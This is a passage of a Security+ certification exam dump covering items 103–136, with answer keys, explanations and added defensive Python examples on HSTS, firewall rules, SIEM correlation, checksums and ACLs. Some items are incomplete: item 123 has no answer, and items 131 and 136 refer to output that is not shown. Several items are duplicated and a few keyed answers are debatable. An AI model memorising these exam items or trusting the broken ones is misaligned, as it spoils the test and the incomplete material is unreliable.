attendees are provided with a network connection to use as a resource. As the convention progresses,
one of the attendees starts to notice delays in the connection, and the HTTPS site requests are reverting
to HTTP.
Which of the following BEST describes what is happening?
A. Birthday collision on the certificate key
B. DNS hijacking to reroute traffic
C. Brute force to the access point
D. A SSL/TLS downgrade
Answer: D
Explanation:
HTTPS requests silently reverting to HTTP is the signature of an SSL/TLS downgrade (SSL stripping)
attack. An attacker on the convention network proxies the attendee's traffic, keeps its own HTTPS
session with the real site, and relays the pages to the victim over plain HTTP, rewriting https:// links and
redirects on the way; the extra hop is what causes the delays. DNS hijacking (option B) would send the
client to a different server but would not by itself change the scheme: the client would still attempt
HTTPS and, unless the attacker also held a valid certificate for the site, would see a certificate error
rather than a working page over HTTP. The same scenario appears again as question 106, where the
answer key also gives D.
104.A company installed several crosscut shredders as part of increased information security practices
targeting data leakage risks.
Which of the following will this practice reduce?
A. Dumpster diving
B. Shoulder surfing
C. Information elicitation
D. Credential harvesting
Answer: A
Explanation:
Crosscut shredders are used to destroy paper documents and reduce the risk of data leakage through
dumpster diving. Dumpster diving is a method of retrieving sensitive information from paper waste by
searching through discarded documents.
References:
✑ CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 2
105.Which of the following is the MOST secure but LEAST expensive data destruction method for data
that is stored on hard drives?
A. Pulverizing
B. Shredding
C. Incinerating
D. Degaussing
Answer: B
Explanation:
Shredding is generally the most secure and cost-effective way to destroy data on media that contain hard
drives or solid-state drives and have reached end of life. An industrial shredder reduces the device to
fragments of a few millimetres (2 mm or smaller under the most stringent standards), and it works for
SSDs as well, where degaussing has no effect. Pulverizing and incinerating are at least as destructive
but need more specialised and more expensive equipment, and degaussing only works on magnetic
media. Therefore, shredding is the most secure but least expensive data destruction method for data
stored on hard drives.
106.one of the attendees starts to notice delays in the connection. and the HTTPS site requests are
reverting to HTTP.
Which of the following BEST describes what is happening?
A. Birthday collision on the certificate key
B. DNS hijacking to reroute traffic
C. Brute force to the access point
D. A SSL/TLS downgrade
Answer: D
Explanation:
The scenario describes an on-path (man-in-the-middle) attack in which the attacker, positioned on the
convention network, intercepts the victim's traffic and strips the SSL/TLS layer: it keeps an encrypted
session with the real website itself, but relays the content to the victim over plain HTTP, rewriting https://
links and redirects to http://. This is known as an SSL/TLS downgrade or SSL stripping attack; the extra
relay hop accounts for the delays, and the attacker can read and modify everything passing between
client and server. HTTP Strict Transport Security (HSTS), especially with preloading, defeats it: a browser
that holds a cached HSTS policy for the site never sends the plaintext request the attacker relies on, and
the preload list closes the first-visit window.
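As an added example, not part of the exam material, the mitigation for the stripping attack in questions 103 and 106: a minimal model of a browser's HSTS policy store (RFC 6797 semantics) in Python. The hostnames, header values and request sequence are constructed, and `strip_proxy` stands in for what an on-path attacker's relay does to the links it forwards.

```python
import re
import time
from urllib.parse import urlsplit, urlunsplit

class HstsCache:
    """Minimal model of a browser's HSTS store (RFC 6797 semantics only)."""

    def __init__(self, now=time.time):
        self._now = now
        self._policies = {}   # host -> (expiry_epoch, include_subdomains)

    def observe_response(self, url, headers):
        """Learn a policy from a response. Only HTTPS responses count: an
        HSTS header seen over plain HTTP is ignored, otherwise an on-path
        attacker could plant or clear policies at will."""
        parts = urlsplit(url)
        if parts.scheme != "https" or not parts.hostname:
            return
        value = headers.get("Strict-Transport-Security")
        if value is None:
            return
        m = re.search(r"max-age\s*=\s*(\d+)", value, re.IGNORECASE)
        if m is None:
            return
        host = parts.hostname.lower()
        max_age = int(m.group(1))
        if max_age == 0:                      # max-age=0 tells the client to forget the host
            self._policies.pop(host, None)
            return
        include_sub = re.search(r"includeSubDomains", value, re.IGNORECASE) is not None
        self._policies[host] = (self._now() + max_age, include_sub)

    def is_known(self, host):
        """True if `host`, or a parent domain whose policy has includeSubDomains,
        has a policy that has not yet expired."""
        labels = host.lower().split(".")
        now = self._now()
        for i in range(len(labels)):
            policy = self._policies.get(".".join(labels[i:]))
            if policy is None:
                continue
            expiry, include_sub = policy
            if expiry > now and (i == 0 or include_sub):
                return True
        return False

    def rewrite(self, url):
        """Upgrade http:// to https:// for known hosts before any request is sent.
        This is the step that defeats a stripping proxy: the client never emits
        the plaintext request the attacker needs to intercept."""
        parts = urlsplit(url)
        if parts.scheme == "http" and parts.hostname and self.is_known(parts.hostname):
            return urlunsplit(("https",) + tuple(parts[1:]))
        return url

def strip_proxy(url):
    """What the attacker's relay does to every https:// link and redirect it forwards."""
    return url.replace("https://", "http://", 1)

if __name__ == "__main__":
    cache = HstsCache()
    # First visit over plain HTTP: nothing known yet, so the stripped URL goes out as-is.
    print(cache.rewrite("http://bank.example/login"))
    # Once one genuine HTTPS response has carried the header, the host is pinned.
    cache.observe_response("https://bank.example/login",
                           {"Strict-Transport-Security": "max-age=31536000; includeSubDomains"})
    print(cache.rewrite(strip_proxy("https://bank.example/account")))
```

The first-visit gap is visible in the code: until the client has seen one genuine HTTPS response, `rewrite` leaves the stripped URL alone, which is exactly why preload lists exist. Ignoring the header over HTTP and honouring `max-age=0` only over HTTPS are the two details implementations most often get wrong.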
107.An organization's Chief Information Security Officer is creating a position that will be responsible for
implementing technical controls to protect data, including ensuring backups are properly maintained.
Which of the following roles would MOST likely include these responsibilities?
A. Data protection officer
B. Data owner
C. Backup administrator
D. Data custodian
E. Internal auditor
Answer: D
Explanation:
The responsibilities of ensuring backups are properly maintained and implementing technical controls to
protect data are the responsibilities of the data custodian role.
References: CompTIA Security+ Study Guide by Emmett Dulaney, Chapter 7: Securing Hosts and Data,
Data Custodian
108.A security engineer is installing a WAF to protect the company's website from malicious web
requests over SSL.
Which of the following is needed to meet the objective?
A. A reverse proxy
B. A decryption certificate
C. A split-tunnel VPN
D. Load-balanced servers
Answer: B
Explanation:
This is the same scenario as question 84. The WAF must be provisioned with the website's certificate
and private key so that it can terminate the SSL/TLS session, inspect the decrypted requests for attacks
such as SQL injection and cross-site scripting, and forward only clean traffic (normally re-encrypted) to
the web servers. Without the key the WAF sees only ciphertext and cannot filter anything; the other
options address routing, remote access and capacity rather than content inspection.
109.A systems analyst determines the source of a high number of connections to a web server that were
initiated by ten different IP addresses that belong to a network block in a specific country.
Which of the following techniques will the systems analyst MOST likely implement to address this issue?
A. Content filter
B. SIEM
C. Firewall rules
D. DLP
Answer: C
Explanation:
A firewall is a network security system that monitors and controls incoming and outgoing traffic based on
predetermined rules. The analyst can add rules that drop connections from the ten IP addresses, or more
simply from the whole network block they belong to, which is the quickest effective way to stop the
flood of connections. Two checks before doing so: confirm the block is not a shared range (a cloud
provider or CDN prefix) that legitimate users also come from, and prefer the tightest prefix that covers
the offenders over an entire country allocation, since every extra address in the rule is collateral
blocking. A content filter inspects payloads rather than sources, a SIEM only correlates and alerts, and
DLP protects data leaving the network.
Reference: CompTIA Security+ SY0-601 Official Text Book, Chapter 5: "Network Security".
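As an added example, not from the study guide, the arithmetic behind the firewall rule in question 109 using Python's standard `ipaddress` module: collapse the ten offending sources into the smallest single prefix that covers them, measure how many other addresses that rule would catch, and emit the corresponding nftables command. The addresses come from the RFC 5737 documentation range and stand in for the foreign network block; the `inet filter` table and `input` chain names in the generated rule are assumptions.

```python
import ipaddress

def covering_network(addresses):
    """Smallest single prefix that contains every address in `addresses`.
    Start from the first host's own /32 (or /128) and widen one bit at a
    time until all the others fit inside it."""
    nets = [ipaddress.ip_network(a) for a in addresses]
    net = nets[0]
    while not all(n.subnet_of(net) for n in nets):
        net = net.supernet()
    return net

def exact_cover(addresses):
    """Tightest list of prefixes that cover exactly the given hosts: no collateral
    blocking, at the cost of more rules (adjacent aligned hosts are merged)."""
    return list(ipaddress.collapse_addresses(ipaddress.ip_network(a) for a in addresses))

def collateral_hosts(net, addresses):
    """How many addresses the single-prefix rule blocks beyond the offenders."""
    return net.num_addresses - len(set(addresses))

def blocks(net, address):
    """Would a drop rule for `net` match a packet from `address`?"""
    return ipaddress.ip_address(address) in net

def nft_rule(net, table="inet filter", chain="input"):
    """nftables command for the drop rule. Table and chain names are assumptions."""
    family = "ip" if net.version == 4 else "ip6"
    return f"nft add rule {table} {chain} {family} saddr {net} drop"

# Constructed sample: ten sources seen hammering the web server, all inside the
# documentation range 203.0.113.0/24, standing in for the foreign network block.
OFFENDERS = ["203.0.113.5", "203.0.113.17", "203.0.113.23", "203.0.113.42",
             "203.0.113.77", "203.0.113.99", "203.0.113.130", "203.0.113.151",
             "203.0.113.200", "203.0.113.250"]

if __name__ == "__main__":
    net = covering_network(OFFENDERS)
    print(nft_rule(net))
    print("collateral addresses blocked:", collateral_hosts(net, OFFENDERS))
    for prefix in exact_cover(OFFENDERS):
        print(nft_rule(prefix))
```

For these ten hosts the single covering prefix is the whole /24, which also blocks 246 addresses that never connected; the exact cover needs ten rules but no collateral. Which trade-off is right depends on whether the block is a dedicated attacker range or a shared allocation.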
110.Which of the following would produce the closest experience of responding to an actual incident
response scenario?
A. Lessons learned
B. Simulation
C. Walk-through
D. Tabletop
Answer: B
Explanation:
A simulation exercise is designed to create an experience that is as close as possible to a real-world
incident response scenario. It involves simulating an attack or other security incident and then having
security personnel respond to the situation as they would in a real incident. References: CompTIA
Security+ SY0-601 Exam Objectives: 1.1 Explain the importance of implementing security concepts,
methodologies, and practices.
111.The Chief Technology Officer of a local college would like visitors to utilize the school's WiFi but must
be able to associate potential malicious activity to a specific person.
Which of the following would BEST allow this objective to be met?
A. Requiring all new, on-site visitors to configure their devices to use WPS
B. Implementing a new SSID for every event hosted by the college that has visitors
C. Creating a unique PSK for every visitor when they arrive at the reception area
D. Deploying a captive portal to capture visitors' MAC addresses and names
Answer: D
Explanation:
A captive portal is a web page that requires visitors to authenticate, register or accept an acceptable use
policy before they are allowed onto the network. By recording each visitor's name together with the MAC
address of the device that registered, potential malicious activity seen on the network can be traced
back to a specific person. One caveat for a real deployment: modern phones and laptops randomize their
Wi-Fi MAC address per network, so the portal should bind the identity to the address as seen during that
visit (or to a per-session credential) rather than assume the MAC is stable across visits. WPS (A) only
simplifies joining the network, and a per-event SSID (B) or a per-visitor PSK (C) ties no name to the
traffic unless a separate record of who received which key is kept.
112.Which of the following environments typically hosts the current version configurations and code,
compares user-story responses and workflow, and uses a modified version of actual data for testing?
A. Development
B. Staging
C. Production
D. Test
Answer: B
Explanation:
Staging is an environment in the software development lifecycle that is used to test a modified version of
the actual data, current version configurations, and code. This environment compares user-story
responses and workflow before the software is released to the production environment. References:
CompTIA Security+ Study Guide, Sixth Edition, Sybex, pg. 496
113.Which of the following BEST describes data streams that are compiled through artificial intelligence
that provides insight on current cyberintrusions, phishing, and other malicious cyberactivity?
A. Intelligence fusion
B. Review reports
C. Log reviews
D. Threat feeds
Answer: A
Explanation:
Intelligence fusion is a process that involves aggregating and analyzing data from multiple sources,
including artificial intelligence, to provide insight on current cyberintrusions, phishing, and other malicious
cyberactivity.
References: CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Glossary, p.767.
114.A new plug-and-play storage device was installed on a PC in the corporate environment.
Which of the following safeguards will BEST help to protect the PC from malicious files on the storage
device?
A. Change the default settings on the PC.
B. Define the PC firewall rules to limit access.
C. Encrypt the disk on the storage device.
D. Plug the storage device in to the UPS
Answer: A
Explanation:
The best safeguard is A, changing the default settings on the PC. The setting that matters most is
AutoRun/AutoPlay: with it disabled, nothing on the removable device executes automatically when it is
plugged in, so a user has to consciously open a file before malicious content can run. Hardening the
defaults also covers keeping antivirus enabled and current, applying operating system and application
updates, and configuring User Account Control and permissions so that a standard user cannot install
software from the device. Encrypting the storage device (option C) protects its contents from disclosure
but does nothing against malicious files already on it.
115.Which of the following disaster recovery tests is the LEAST time consuming for the disaster recovery
team?
A. Tabletop
B. Parallel
C. Full interruption
D. Simulation
Answer: A
Explanation:
A tabletop exercise is a type of disaster recovery test that simulates a disaster scenario in a discussion-
based format, without actually disrupting operations or requiring physical testing of recovery procedures.
It is the least time-consuming type of test for the disaster recovery team.
116.Which of the following BEST describes a technique that compensates researchers for finding
vulnerabilities?
A. Penetration testing
B. Code review
C. Wardriving
D. Bug bounty
Answer: D
Explanation:
A bug bounty program compensates security researchers, usually financially, for finding and responsibly
reporting vulnerabilities in software, websites or other systems. It adds a layer of security testing beyond
internal review and penetration tests, and gives researchers an incentive to report flaws to the owner
rather than exploit or sell them. Companies such as Meta (formerly Facebook), Google and Microsoft run
such programs to improve the security of their products and services.
117.A security administrator has discovered that workstations on the LAN are becoming infected with
malware. The cause of the infections appears to be users receiving phishing emails that are bypassing
the current email-filtering technology. As a result, users are being tricked into clicking on malicious URLs,
as no internal controls currently exist in the environment to evaluate their safety.
Which of the following would be BEST to implement to address the issue?
A. Forward proxy
B. HIDS
C. Awareness training
D. A jump server
E. IPS
Answer: C
Explanation:
Awareness training should be implemented to educate users on the risks of clicking on malicious URLs.
References: CompTIA Security+ Study Guide: Exam SY0-601, Chapter 9
118.A security researcher has alerted an organization that its sensitive user data was found for sale on a
website.
Which of the following should the organization use to inform the affected parties?
A. An incident response plan
B. A communications plan
C. A business continuity plan
D. A disaster recovery plan
Answer: B
Explanation:
The organization should use a communications plan to inform the affected parties. A communications
plan is a document that outlines how an organization will communicate with internal and external
stakeholders during a crisis or incident. It should include details such as who will be responsible for
communicating with different stakeholders, what channels will be used to communicate, and what
messages will be communicated.
An incident response plan is a document that outlines the steps an organization will take to respond to a
security incident or data breach. A business continuity plan is a document that outlines how an
organization will continue to operate during and after a disruption. A disaster recovery plan is a document
that outlines how an organization will recover its IT infrastructure and data after a disaster.
119.Which of the following is a risk that is specifically associated with hosting applications in the public
cloud?
A. Unsecured root accounts
B. Zero day
C. Shared tenancy
D. Insider threat
Answer: C
Explanation:
When hosting applications in the public cloud, there is a risk of shared tenancy, meaning that multiple
organizations are sharing the same infrastructure. This can potentially allow one tenant to access
another tenant's data, creating a security risk.
References: CompTIA Security+ Certification Exam Objectives (SY0-601)
120.
After a hardware incident, an unplanned emergency maintenance activity was conducted to rectify the
issue. Multiple alerts were generated on the SIEM during this period of time.
Which of the following BEST explains what happened?
A. The unexpected traffic correlated against multiple rules, generating multiple alerts.
B. Multiple alerts were generated due to an attack occurring at the same time.
C. An error in the correlation rules triggered multiple alerts.
D. The SIEM was unable to correlate the rules, triggering the alerts.
Answer: A
Explanation:
Multiple alerts were generated on the SIEM during the emergency maintenance activity due to
unexpected traffic correlated against multiple rules. The SIEM generates alerts when it detects an event
that matches a rule in its rulebase. If the event matches multiple rules, the SIEM will generate multiple
alerts.
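As an added example, not from the study guide, a toy correlation engine in Python that shows the behaviour question 120 describes: one burst of unexpected traffic satisfying several rules at once, so each event raises several alerts. The rules, the asset list and the three events from a Saturday-night maintenance window are all constructed; the maintenance-window tagging is a design choice for the example, not a feature of any particular SIEM product.

```python
from collections import Counter
from datetime import datetime, timedelta

KNOWN_HOSTS = {"10.0.0.5", "10.0.0.6"}   # assumed asset inventory

# Toy correlation rules: each maps an event dict to True when it matches.
# Rules test "type" first so they never touch fields other event types lack.
RULES = {
    "port-scan":          lambda e: e["type"] == "conn" and e["dst_port"] not in (22, 443),
    "new-admin-login":    lambda e: e["type"] == "auth" and e["user"] == "root",
    "off-hours-activity": lambda e: not 8 <= e["ts"].hour < 18,
    "unknown-host":       lambda e: e["src"] not in KNOWN_HOSTS,
}

def correlate(events, rules, maintenance=None):
    """Evaluate every rule against every event and return one alert per match.

    An event that satisfies several rules produces several alerts: that is the
    engine working as designed, not a rule error. If a maintenance window
    (start, end) is given, alerts for events inside it are tagged as suppressed
    rather than dropped, so the audit trail of what happened is preserved.
    """
    alerts = []
    for event in events:
        in_window = maintenance is not None and maintenance[0] <= event["ts"] <= maintenance[1]
        for name, matches in rules.items():
            if matches(event):
                alerts.append({"rule": name, "event": event, "suppressed": in_window})
    return alerts

def summarize(alerts):
    """Alerts per rule: the view an analyst uses to recognise a single root cause."""
    return Counter(a["rule"] for a in alerts)

# Constructed sample: three events from an unplanned Saturday-night maintenance.
T0 = datetime(2024, 3, 2, 23, 10)
EVENTS = [
    {"ts": T0,                        "type": "conn", "src": "10.0.0.77", "dst_port": 8443},
    {"ts": T0 + timedelta(minutes=1), "type": "auth", "src": "10.0.0.77", "user": "root"},
    {"ts": T0 + timedelta(minutes=2), "type": "conn", "src": "10.0.0.5",  "dst_port": 443},
]
MAINTENANCE = (T0 - timedelta(minutes=5), T0 + timedelta(minutes=30))

if __name__ == "__main__":
    for alert in correlate(EVENTS, RULES):
        print(alert["rule"], alert["event"]["ts"].time(), alert["event"]["src"])
    print(summarize(correlate(EVENTS, RULES)))
    print("suppressed during maintenance:",
          sum(a["suppressed"] for a in correlate(EVENTS, RULES, MAINTENANCE)))
```

Three events yield seven alerts, and the per-rule summary makes the single cause obvious. Opening a maintenance window in the SIEM before the work starts (so the alerts are tagged, not lost) is the operational fix; deleting or loosening the rules is not.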
121.As part of a company's ongoing SOC maturation process, the company wants to implement a
method to share cyberthreat intelligence data with outside security partners.
Which of the following will the company MOST likely implement?
A. TAXII
B. TLP
C. TTP
D. STIX
Answer: A
Explanation:
Trusted Automated Exchange of Intelligence Information (TAXII) is the standard transport protocol for
sharing cyber threat intelligence between organizations: it defines how collections of intelligence are
published, requested and pulled over HTTPS, so the exchange can be automated, secure and timely. The
intelligence itself is normally expressed in STIX (Structured Threat Information eXpression), so the two
go together: STIX is the content format and TAXII is the exchange mechanism, which is why TAXII is the
answer to a question about sharing. TLP (Traffic Light Protocol) only marks how widely a piece of
information may be redistributed, and TTP (tactics, techniques and procedures) describes adversary
behaviour rather than a sharing method.
References: CompTIA Security+ Certification Exam Objectives - 3.6 Given a scenario, implement secure
network architecture concepts. Study Guide: Chapter 4, page 167.
122.A network analyst is setting up a wireless access point for a home office in a remote, rural location.
The requirement is that users need to connect to the access point securely but do not want to have to
remember passwords.
Which of the following should the network analyst enable to meet the requirement?
A. MAC address filtering
B. 802.1X
C. Captive portal
D. WPS
Answer: D
Explanation:
The network analyst should enable Wi-Fi Protected Setup (WPS), which lets users join the encrypted
network by pressing a button on the access point or entering a short PIN instead of remembering a
passphrase. Caveat for practice: the WPS PIN method has a well-known weakness (the 8-digit PIN is
validated in two halves, so an online brute-force attack needs only about 11,000 attempts rather than
the full keyspace), so push-button mode is the safer choice and the PIN method should be disabled once
devices are enrolled.
Reference: CompTIA Security+ Study Guide, Exam SY0-601, Chapter 4: Identity and Access
Management
123.A security analyst is investigating a phishing email that contains a malicious document directed to
the company's Chief Executive Officer (CEO).
Which of the following should the analyst perform to understand the threat and retrieve possible IoCs?
A. Run a vulnerability scan against the CEO's computer to find possible vulnerabilities
B. Install a sandbox to run the malicious payload in a safe environment
124.A security researcher has alerted an organization that its sensitive user data was found for sale on a
website.
Which of the following should the organization use to inform the affected parties?
A. An incident response plan
B. A communications plan
C. A business continuity plan
D. A disaster recovery plan
Answer: B
Explanation:
A communications plan should be used to inform the affected parties about the sale of sensitive user
data on a website. The communications plan should detail how the organization will handle media
inquiries, how to communicate with customers, and how to respond to other interested parties.
125.Which of the following BEST describes the method a security analyst would use to confirm a file that
is downloaded from a trusted security website is not altered in transit or corrupted using a verified
checksum?
A. Hashing
B. Salting
C. Integrity
D. Digital signature
Answer: A
Explanation:
Hashing is a cryptographic function that produces a unique fixed-size output (i.e., hash value) from an
input (i.e., data). The hash value is a digital fingerprint of the data, which means that if the data changes,
so too does the hash value. By comparing the hash value of the downloaded file with the hash value
provided by the security website, the security analyst can verify that the file has not been altered in
transit or corrupted.
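A worked illustration of the checksum verification described in this explanation, added here as an example; it is not taken from the Dumpsbase material or from the CompTIA study guide. It assumes the vendor publishes a SHA-256 hex digest beside the download; the file contents, file names and temporary directory below are constructed for the demonstration:

```python
import hashlib
import hmac
import os
import tempfile

# Constructed stand-in for a downloaded release archive (not a real file).
SAMPLE_CONTENT = b"example-tool-1.2.3 release archive (constructed sample bytes)\n"


def sha256_of_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Stream the file through SHA-256 so large downloads need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def publish_checksum(data: bytes) -> str:
    """Vendor side: hash the release and publish the hex digest next to it."""
    return hashlib.sha256(data).hexdigest()


def verify_download(path: str, published_checksum: str) -> bool:
    """Analyst side: recompute the digest and compare it with the published one.

    Vendors print digests in upper or lower case, so normalise before comparing;
    hmac.compare_digest is the idiomatic constant-time string comparison.
    """
    actual = sha256_of_file(path)
    return hmac.compare_digest(actual, published_checksum.strip().lower())


def demo() -> tuple:
    """Verify an intact copy and a copy altered by a single byte."""
    published = publish_checksum(SAMPLE_CONTENT)
    with tempfile.TemporaryDirectory() as workdir:
        intact = os.path.join(workdir, "intact.bin")
        tampered = os.path.join(workdir, "tampered.bin")
        with open(intact, "wb") as handle:
            handle.write(SAMPLE_CONTENT)
        # Change one byte: a one-bit difference produces an unrelated digest.
        with open(tampered, "wb") as handle:
            handle.write(SAMPLE_CONTENT[:-2] + b"X\n")
        return verify_download(intact, published), verify_download(tampered, published)


if __name__ == "__main__":
    print(demo())  # (True, False)
```

The intact copy verifies and the copy with one changed byte does not. The limit of the technique is worth keeping in mind: a checksum fetched from the same site as the file only detects corruption or tampering in transit if the checksum itself arrived intact over a trusted channel such as HTTPS; proving who produced the file needs the digital signature named in option D.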
126.If a current private key is compromised, which of the following would ensure it cannot be used to
decrypt all historical data?
A. Perfect forward secrecy
B. Elliptic-curve cryptography
C. Key stretching
D. Homomorphic encryption
Answer: A
Explanation:
Perfect forward secrecy would ensure that a compromised private key cannot be used to decrypt all
historical data. Perfect forward secrecy (PFS) is a property of key-exchange protocols that generate a
unique, ephemeral session key for each session between two parties. This ensures that even if one
session key (or the long-term private key) is compromised, it cannot be used to decrypt other sessions.
127.A company is implementing a new SIEM to log and send alerts whenever malicious activity is
blocked by its antivirus and web content filters.
Which of the following is the primary use case for this scenario?
A. Implementation of preventive controls
B. Implementation of detective controls
C. Implementation of deterrent controls
D. Implementation of corrective controls
Answer: B
Explanation:
A Security Information and Event Management (SIEM) system is a tool that collects and analyzes
security-related data from various sources to detect and respond to security incidents. References:
CompTIA Security+ Study Guide 601, Chapter 5
128.After segmenting the network, the network manager wants to control the traffic between the
segments.
Which of the following should the manager use to control the network traffic?
A. A DMZ
B. A VPN
C. A VLAN
D. An ACL
Answer: D
Explanation:
After segmenting the network, a network manager can use an access control list (ACL) to control the
traffic between the segments. An ACL is a set of rules that permit or deny traffic based on its
characteristics, such as the source and destination IP addresses, protocol type, and port number.
References: CompTIA Security+ Certification Guide, Exam SY0-501
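To make the ACL semantics concrete, here is an added example (not from the Dumpsbase material) of a first-match access control list evaluated over constructed packets. The segment addresses, the rule set and the permit/deny/any vocabulary are assumptions modelled loosely on router-style ACLs:

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class AclRule:
    action: str                      # "permit" or "deny"
    proto: str                       # "tcp", "udp", "icmp" or "any"
    src: ipaddress.IPv4Network
    dst: ipaddress.IPv4Network
    dst_port: Optional[int] = None   # None matches any destination port


@dataclass(frozen=True)
class Packet:
    proto: str
    src: ipaddress.IPv4Address
    dst: ipaddress.IPv4Address
    dst_port: Optional[int] = None


def rule(action: str, proto: str, src: str, dst: str, dst_port: Optional[int] = None) -> AclRule:
    return AclRule(action, proto, ipaddress.ip_network(src), ipaddress.ip_network(dst), dst_port)


# Constructed example policy for traffic from a user segment (10.10.0.0/24) into a
# web segment (10.20.0.0/24). The address ranges are assumptions for illustration.
SEGMENT_ACL: List[AclRule] = [
    rule("permit", "tcp", "10.10.0.0/24", "10.20.0.0/24", 443),   # users -> web tier, HTTPS only
    rule("permit", "tcp", "10.10.0.5/32", "10.20.0.0/24", 22),    # one admin host may SSH in
    rule("permit", "icmp", "10.10.0.0/24", "10.20.0.0/24"),       # allow ping for troubleshooting
    rule("deny", "any", "0.0.0.0/0", "0.0.0.0/0"),                # explicit final deny
]


def matches(r: AclRule, p: Packet) -> bool:
    return (
        (r.proto == "any" or r.proto == p.proto)
        and p.src in r.src
        and p.dst in r.dst
        and (r.dst_port is None or r.dst_port == p.dst_port)
    )


def evaluate(acl: List[AclRule], packet: Packet) -> str:
    """First matching rule wins; a packet that matches no rule falls through to implicit deny."""
    for r in acl:
        if matches(r, packet):
            return r.action
    return "deny"


def check(acl: List[AclRule], proto: str, src: str, dst: str, dst_port: Optional[int] = None) -> str:
    packet = Packet(proto, ipaddress.ip_address(src), ipaddress.ip_address(dst), dst_port)
    return evaluate(acl, packet)


if __name__ == "__main__":
    print(check(SEGMENT_ACL, "tcp", "10.10.0.7", "10.20.0.3", 443))  # permit
    print(check(SEGMENT_ACL, "tcp", "10.10.0.7", "10.20.0.3", 22))   # deny
```

Rule order matters: the first matching rule wins, so moving the final deny above the permits would block everything. Traffic that matches no rule also falls through to deny, which is the behaviour most network ACLs implement.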
129.The help desk has received calls from users in multiple locations who are unable to access core
network services. The network team has identified and turned off the network switches using remote
commands.
Which of the following actions should the network team take NEXT?
A. Disconnect all external network connections from the firewall
B. Send response teams to the network switch locations to perform updates
C. Turn on all the network switches by using the centralized management software
D. Initiate the organization's incident response plan.
Answer: D
Explanation:
An incident response plan is a set of procedures and guidelines that defines how an organization should
respond to a security incident. An incident response plan typically includes the following phases:
preparation, identification, containment, eradication, recovery, and lessons learned.
If the help desk has received calls from users in multiple locations who are unable to access core
network services, it could indicate that a network outage or a denial-of-service attack has occurred. The
network team has identified and turned off the network switches using remote commands, which could
be a containment measure to isolate the affected devices and prevent further damage.
The next action that the network team should take is to initiate the organization's incident response
plan, which would involve notifying the appropriate stakeholders, such as management, security team,
legal team, etc., and following the predefined steps to investigate, analyze, document, and resolve the
incident.
The other options are not correct because:
✑ A. Disconnect all external network connections from the firewall. This could be another containment
measure to prevent external attackers from accessing the network, but it would also disrupt legitimate
network traffic and services. This action should be taken only if it is part of the incident response plan
and after notifying the relevant parties.
✑ B. Send response teams to the network switch locations to perform updates. This could be a recovery
measure to restore normal network operations and apply patches or updates to prevent future incidents,
but it should be done only after the incident has been properly identified, contained, and eradicated.
✑ C. Turn on all the network switches by using the centralized management software. This could be a
recovery measure to restore normal network operations, but it should be done only after the incident has
been properly identified, contained, and eradicated.
According to CompTIA Security+ SY0-601 Exam Objectives 1.5 Given a scenario, analyze indicators of
compromise and determine the type of malware:
“An incident response plan is a set of procedures and guidelines that defines how an organization should
respond to a security incident. An incident response plan typically includes the following phases:
preparation, identification, containment, eradication, recovery, and lessons learned.”
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
130.A company acquired several other small companies. The company that acquired the others
is transitioning network services to the cloud. The company wants to make sure that performance and
security remain intact.
Which of the following BEST meets both requirements?
A. High availability
B. Application security
C. Segmentation
D. Integration and auditing
Answer: A
Explanation:
High availability refers to the ability of a system or service to remain operational and available to users
with minimal downtime. By ensuring high availability, the company can maintain good performance and
ensure that users have access to the network services they need. High availability can also improve
security, as it helps to prevent disruptions that could potentially be caused by security incidents or other
issues.
131.An analyst is generating a security report for the management team. Security guidelines recommend
disabling all listening unencrypted services.
Given this output from Nmap:
132.A security team suspects that the cause of recent power consumption overloads is the unauthorized
use of empty power outlets in the network rack.
Which of the following options will mitigate this issue without compromising the number of outlets
available?
A. Adding a new UPS dedicated to the rack
B. Installing a managed PDU
C. Using only dual-power-supply units
D. Increasing power generator capacity
Answer: B
Explanation:
A managed Power Distribution Unit (PDU) allows you to monitor and control power outlets on the rack.
This will allow the security team to identify which devices are drawing power and from which outlets,
which can help to identify any unauthorized devices. Moreover, with a managed PDU, you can also
control the power to outlets, turn off outlets that are not in use, and set up alerts if an outlet is
overloaded. This will help to mitigate the issue of power consumption overloads without compromising
the number of outlets available.
Reference: CompTIA Security+ Study Guide (SY0-601) 7th Edition by Emmett Dulaney, Chuck Easttom
133.A Chief Information Officer is concerned about employees using company-issued laptops to steal
data when accessing network shares.
Which of the following should the company implement?
A. DLP
B. CASB
C. HIDS
D. EDR
E. UEFI
Answer: A
Explanation:
The company should implement Data Loss Prevention (DLP) to prevent employees from stealing data.
References: CompTIA Security+ Study Guide: Exam SY0-601, Chapter 8
134.Which of the following BEST describes a social-engineering attack that relies on an executive at a
small business visiting a fake banking website where credit card and account details are harvested?
A. Whaling
B. Spam
C. Invoice scam
D. Pharming
Answer: A
Explanation:
A social engineering attack that relies on an executive at a small business visiting a fake banking website
where credit card and account details are harvested is known as whaling. Whaling is a type of phishing
attack that targets high-profile individuals, such as executives, to steal sensitive information or gain
access to their accounts.
135.Which of the following are the MOST likely vectors for the unauthorized inclusion of vulnerable code
in a software company’s final software releases? (Select TWO.)
A. Unsecure protocols
B. Use of penetration-testing utilities
C. Weak passwords
D. Included third-party libraries
E. Vendors/supply chain
F. Outdated anti-malware software
Answer: D,E
Explanation:
The most likely vectors for the unauthorized inclusion of vulnerable code in a software company's final
software releases are included third-party libraries and vendors/supply chain. References: CompTIA
Security+ Study Guide by Emmett Dulaney, Chapter 8: Application, Data, and Host Security, Supply
Chain and Software Development Life Cycle
136.A user attempts to load a web-based application, but the expected login screen does not appear. A
help desk analyst troubleshoots the issue by running the following command and reviewing the output on
the user's PC.
The help desk analyst then runs the same command on the local PC.
Which of the following BEST describes the attack that is being detected?
A. Domain hijacking
B. DNS poisoning
C. MAC flooding
D. Evil twin
Answer: B
Explanation:
DNS poisoning, also known as DNS spoofing or DNS cache poisoning, is a form of computer security
hacking in which corrupt Domain Name System (DNS) data is introduced into the DNS resolver’s cache,
causing the name server to return an incorrect result record, such as an IP address. This results in traffic
being diverted to the attacker’s computer (or any other malicious destination).
DNS poisoning can be performed by various methods, such as:
✑ Intercepting and forging DNS responses from legitimate servers
✑ Compromising DNS servers and altering their records
